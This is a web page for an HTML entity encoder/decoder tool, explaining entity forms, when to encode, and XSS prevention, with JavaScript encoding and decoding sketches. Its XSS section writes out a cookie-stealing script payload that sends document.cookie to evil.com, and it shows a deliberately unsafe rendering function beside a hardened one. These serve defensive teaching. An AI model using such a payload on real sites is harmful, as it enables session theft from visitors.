Pixab AI
Files never leave your browser · Instant processing · 100% free, no signup · Works offline after first load

HTML Entity Encoder / Decoder

Encode and decode HTML entities instantly. Includes a searchable reference of 75+ common HTML entities with symbols, names, decimal and hex codes.

Encodes the 5 characters that are special in HTML: < > & " ' — the minimum needed for safe HTML embedding.

How it works

  1. Encode tab: paste your text, choose encoding mode (special chars or all non-ASCII), copy the encoded output.
  2. Decode tab: paste HTML with entities (named, decimal, or hex) to convert back to plain text.
  3. Reference tab: browse or search 75+ common HTML entities. Click any row to copy the entity code.

Why HTML Entities Exist

HTML uses certain characters as part of its markup syntax. The angle brackets < and > delimit tags, the ampersand & introduces entity references, and quotation marks " delimit attribute values. If you need to display any of these characters as content — rather than as markup — you cannot write them literally. The browser would interpret them as HTML structure.

HTML entities solve this by providing an alternative way to represent characters using only safe ASCII characters. &lt; displays as <, &amp; displays as &, and &copy; displays as ©. Entities also allow you to include characters that are difficult or impossible to type directly — mathematical symbols, arrows, currency signs, and characters from other scripts — in HTML documents using only keyboard-typeable ASCII.

Named vs Decimal vs Hexadecimal Entities

HTML entities come in three forms, all equivalent to the browser:

Named entities use a descriptive name between & and ;. Examples: &copy; (©), &mdash; (—), &euro; (€). Named entities are the most human-readable form and are widely supported in HTML5. The set of named entities is defined by the HTML specification — not every Unicode character has a named entity.

Decimal entities use the decimal Unicode code point: &#169; (©), &#8364; (€). Any Unicode character can be represented as a decimal entity, even if it has no named form.

Hexadecimal entities use the hexadecimal code point with an x prefix: &#xA9; (©), &#x20AC; (€). Preferred by developers who are comfortable with hex — the values align with standard Unicode code point notation (U+00A9, U+20AC).
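The three forms decode to the same character. The sketch below is an added example (not this tool's own code) of a single-pass decoder for all three; the NAMED table is a small constructed subset, and numeric handling is simplified so that invalid code points become U+FFFD.

```javascript
// Constructed subset of the named-entity table; the HTML specification defines the full set.
const NAMED = {
  lt: "<", gt: ">", amp: "&", quot: '"', apos: "'",
  nbsp: "\u00A0", copy: "\u00A9", euro: "\u20AC", mdash: "\u2014",
};

// Map a numeric reference to a character. Zero, surrogates and values above
// U+10FFFF are not valid characters, so they become the replacement character.
// Simplified: the HTML parser has further special cases not handled here.
function fromCodePoint(cp) {
  const invalid = !Number.isInteger(cp) || cp === 0 || cp > 0x10FFFF ||
    (cp >= 0xD800 && cp <= 0xDFFF);
  return invalid ? "\uFFFD" : String.fromCodePoint(cp);
}

// Decode named, decimal and hexadecimal references in one left-to-right pass.
// Unknown names are left untouched rather than guessed.
function decodeEntities(text) {
  const pattern = /&(?:#[xX]([0-9a-fA-F]+)|#([0-9]+)|([A-Za-z][A-Za-z0-9]*));/g;
  return String(text).replace(pattern, (match, hex, dec, name) => {
    if (hex !== undefined) return fromCodePoint(parseInt(hex, 16));
    if (dec !== undefined) return fromCodePoint(parseInt(dec, 10));
    // Own-property check so names like "constructor" are not resolved via the prototype.
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : match;
  });
}

// Constructed sample input: the same two characters in all three forms.
console.log(decodeEntities("&copy; &#169; &#xA9; / &euro; &#8364; &#x20AC;"));
// A single pass decodes exactly one layer.
console.log(decodeEntities("&amp;lt;b&amp;gt;"));
```

Decoding once turns &amp;lt; into the text &lt;. Running the decoder a second time on that output would yield <, so decoded text should not be decoded again before it is placed in markup.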

When to Encode and When Not To

Always encode in HTML content: Any <, >, and & that appear in text content and are not intended as HTML markup must be encoded. Not encoding these creates malformed HTML and potential security vulnerabilities.

Always encode in HTML attributes: Any " or ' inside attribute values delimited by the same quote character must be encoded. Use &quot; in double-quoted attributes or &apos; in single-quoted attributes.

Do not over-encode: Modern HTML documents should be saved as UTF-8. In UTF-8 documents, it is perfectly valid to include Unicode characters like ©, €, or em-dashes directly in the source without encoding them. Over-encoding every non-ASCII character bloats the HTML and makes the source harder to read. Only encode the five HTML-special characters when necessary.

In JSON, XML, and template engines: Similar rules apply. JSON encodes backslash and quotes. XML encodes the same set as HTML. Template engines (Jinja2, Handlebars, Blade, etc.) auto-escape HTML by default — understand when auto-escaping is active and when you need to opt into raw output. Use our JSON Formatter to inspect JSON with special characters.

HTML Entities and XSS Prevention

Cross-Site Scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious scripts into web pages viewed by other users. The classic vector: a website displays user-provided text without encoding it, so an attacker submits <script>document.location="https://evil.com/?c="+document.cookie</script>. If this is rendered as raw HTML, the script executes in every visitor's browser.

HTML entity encoding is the primary defense. If user input is encoded before rendering, <script> becomes &lt;script&gt; — which the browser displays as literal text, not as a tag. The script never executes.

Every major web framework auto-escapes by default: React, Vue, and Angular all HTML-encode dynamic content inserted via the standard templating syntax. {{variable}} in these frameworks produces encoded output. Explicitly opting into raw HTML (React's dangerouslySetInnerHTML, Vue's v-html) bypasses encoding and must be used with extreme care — only with content you control or have sanitized.
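To make the encoding step concrete, here is an added example (not this tool's or any framework's code) showing the two encode modes described above and the same comment template rendered with and without encoding. The function names and the sample input are constructed for illustration.

```javascript
// The five HTML-special characters and their entity forms.
const SPECIAL = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Mode 1: encode only the five special characters.
function encodeSpecial(text) {
  return String(text).replace(/[&<>"']/g, (ch) => SPECIAL[ch]);
}

// Mode 2: additionally write every non-ASCII code point as a hex entity.
// The "u" flag makes the pattern match whole code points, including astral ones.
function encodeAllNonAscii(text) {
  return encodeSpecial(text).replace(/[^\x00-\x7F]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16).toUpperCase()};`);
}

// Vulnerable: user input is concatenated into the markup unchanged,
// so quotes end the attribute early and tags in the body become markup.
function renderCommentUnsafe(author, body) {
  return `<p title="${author}">${body}</p>`;
}

// Hardened: each dynamic value is encoded and the attribute stays quoted.
function renderComment(author, body) {
  return `<p title="${encodeSpecial(author)}">${encodeSpecial(body)}</p>`;
}

// Constructed sample input.
const sampleAuthor = `Tom "TJ" O'Neil`;
const sampleBody = "<script>alert(1)</script> & more";

console.log(renderCommentUnsafe(sampleAuthor, sampleBody));
console.log(renderComment(sampleAuthor, sampleBody));
console.log(encodeAllNonAscii("© 5 < 6 €"));
```

This encoding covers HTML text and quoted attribute values. Values placed in other contexts, such as URLs or CSS, need the encoding that belongs to that context.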

Most Common Entities for Developers

In day-to-day web development, you encounter a small set of entities repeatedly:

  • &amp; — Use instead of & in HTML attribute values and content
  • &lt; / &gt; — Required when displaying code snippets in HTML
  • &quot; — Required in double-quoted attribute values containing quotes
  • &nbsp; — Non-breaking space for layout control (though CSS is usually better)
  • &mdash; — Em dash for typography in prose
  • &copy; — Copyright notice in footers
  • &trade; — Trademark symbol in product names
  • &hellip; — Ellipsis for truncated text
  • &rarr; — Right arrow for navigation cues

Use our Reference tab to find the entity for any symbol. Pair with the URL Encoder when you need to embed HTML-encoded content in a URL parameter.

Frequently Asked Questions

Do I need to encode all non-ASCII characters in modern HTML?

No. With a UTF-8 charset declaration (<meta charset="UTF-8">), you can include Unicode characters like © and € directly in the source. Only encode the five HTML-special characters (< > & " ') that have structural meaning in HTML.

What is the difference between &apos; and &#39;?

They represent the same character (apostrophe/single quote). &apos; is defined in XML and HTML5 but was not part of HTML4. &#39; works in all HTML versions. For maximum compatibility, use &#39; for apostrophes in HTML attributes.

Why does &nbsp; behave differently from a regular space?

A regular space is a line-break opportunity — browsers can break a line there. A non-breaking space (&nbsp;, U+00A0) prevents line breaks between the words it connects. It also does not collapse like regular whitespace in HTML. Use it for units (100&nbsp;km), names that should not break, and narrow formatting. For most layout control, CSS is more appropriate.

How do I display code snippets in HTML?

Wrap code in <code> or <pre><code> tags and encode all <, >, and & characters in the code content. Many syntax highlighting libraries do this automatically. This tool's Encode tab converts a code snippet to HTML-safe form instantly.

Does JavaScript handle HTML entities automatically?

Not automatically. innerHTML and template literals do not encode HTML. React's JSX, Vue's template syntax, and Angular's interpolation all encode by default. If you set element.textContent = userInput, the browser auto-encodes. If you set element.innerHTML = userInput, it does not — a common XSS vulnerability.

What is the difference between HTML entities and URL encoding?

HTML entities make characters safe for HTML documents. URL encoding (percent encoding) makes characters safe for URLs. They are different encoding systems for different contexts. A URL inside an HTML attribute needs both: the URL must be percent-encoded, and the attribute value must be HTML-encoded. Use our URL Encoder for URL encoding.
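The two layers, applied in order, as an added example (not part of this tool): each query parameter is percent-encoded first, then the finished URL is HTML-encoded for the href attribute. The function names, example.com URL and the http/https allow-list are assumptions made for this sketch.

```javascript
// HTML-encode a value for use inside a quoted attribute or a text node.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Layer 1: percent-encode each parameter name and value separately,
// then join the pairs with a literal "&".
function buildUrl(base, params) {
  const url = new URL(base); // throws on malformed input
  // Assumption for this example: only http(s) links are rendered.
  // Entity encoding makes the value safe as markup; it does not validate the target.
  if (url.protocol !== "https:" && url.protocol !== "http:") {
    throw new Error("scheme not allowed: " + url.protocol);
  }
  const query = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
  return url.origin + url.pathname + (query ? "?" + query : "");
}

// Layer 2: HTML-encode the finished URL for the attribute and the label for the text node.
function renderLink(base, params, label) {
  return `<a href="${escapeHtml(buildUrl(base, params))}">${escapeHtml(label)}</a>`;
}

// Constructed sample input.
const sampleLink = renderLink(
  "https://example.com/search",
  { q: `Tom & "Jerry" <3`, lang: "en" },
  "Tom & Jerry"
);
console.log(sampleLink);
```

The "&" that separates parameters becomes &amp; in the attribute, while the "&" inside the search term is already %26. encodeURIComponent leaves the apostrophe as-is, so the HTML layer is what encodes it.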

Can I use hex entities in CSS content?

CSS uses a different escape syntax — a backslash followed by the hex code point: \" or \A9 (©). HTML hex entities (&#xA9;) do not work in CSS. However, you can use the actual Unicode character directly in CSS string values with a UTF-8 encoded stylesheet.
